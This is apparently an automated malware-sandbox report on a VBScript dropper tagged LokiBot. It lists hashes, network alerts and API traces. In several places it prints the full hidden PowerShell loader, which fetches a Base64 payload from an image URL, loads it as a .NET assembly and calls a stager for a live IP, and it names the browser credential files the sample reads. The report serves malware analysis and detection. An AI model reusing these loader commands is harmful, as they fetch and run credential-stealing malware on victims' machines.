Summary | ZeroBOX

HTMLobject.vbs

LokiBot Generic Malware Antivirus PWS KeyLogger SMTP AntiDebug PowerShell AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 25, 2023, 1:16 p.m. Oct. 25, 2023, 1:18 p.m.
Size 325.7KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 74a3ea36669a5bdbeff3775545527a92
SHA256 b4f6b87e41f69f8f570148bab3fc32c6caa76c583d4f13e5a824ed87c9fbe585
CRC32 86704368
ssdeep 6144:SZSm81Zw+hmaIG5Xtu8mQwxymghmvDAQWjYuCSu1mQwNKgY3IVYe78tER8RjR3RV:SZSm81Zw+hmaIG5Xtu8mQwxymghmvDAg
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLobject.vbs

    2052
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[obfuscated Base64 string omitted]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2160
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2272

IP Address Status Action
104.21.83.102 Active Moloch
141.98.6.91 Active Moloch
164.124.101.2 Active Moloch
192.185.51.90 Active Moloch
23.67.53.27 Active Moloch
64.185.227.156 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 104.21.83.102:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:50800 -> 8.8.8.8:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.185.51.90:587 -> 192.168.56.103:49172 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 192.185.51.90:587 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 141.98.6.91:80 -> 192.168.56.103:49167 2020423 ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 Exploit Kit Activity Detected
UDP 192.168.56.103:50800 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 64.185.227.156:443 -> 192.168.56.103:49170 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49170 -> 64.185.227.156:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.103:49166 -> 104.21.83.102:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=imageupload.io | 7f:d3:2d:a3:40:e0:de:64:4d:f5:a5:0f:96:b0:ae:07:58:85:a8:85
TLS 1.2 192.168.56.103:49172 -> 192.185.51.90:587 | C=US, O=Let's Encrypt, CN=R3 | CN=*.egyptscientific.com | b0:5d:e4:ac:6c:e1:5c:a8:e4:6b:01:e8:16:48:c9:c7:47:b0:69:89

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: True
console_handle: 0x00000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0028b980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0028c080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0028b740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0028bd80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0028c1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0028c280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0028c300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0039e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0039e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0039ee78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x8f0684
0x8f05e4
0x8f03e2
0x8f010b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7453f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8f392f
registers.esp: 3402920
registers.edi: 3402944
registers.eax: 0
registers.ebp: 3402956
registers.edx: 195
registers.ebx: 3403204
registers.esi: 39999792
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://141.98.6.91/windows/HNB.txt
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
request GET http://141.98.6.91/windows/HNB.txt
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 2097152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02760000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02921000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02922000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ce000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02901000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02902000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02903000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02904000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Chromium\User Data
file C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -command "$Codigo = '[encoded payload omitted]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded payload omitted]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
wmi SELECT * FROM Win32_Processor
wmi select * from Win32_OperatingSystem
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2164
thread_handle: 0x000002f4
process_identifier: 2160
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded payload omitted]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002fc
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '[obfuscated base64 payload omitted]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
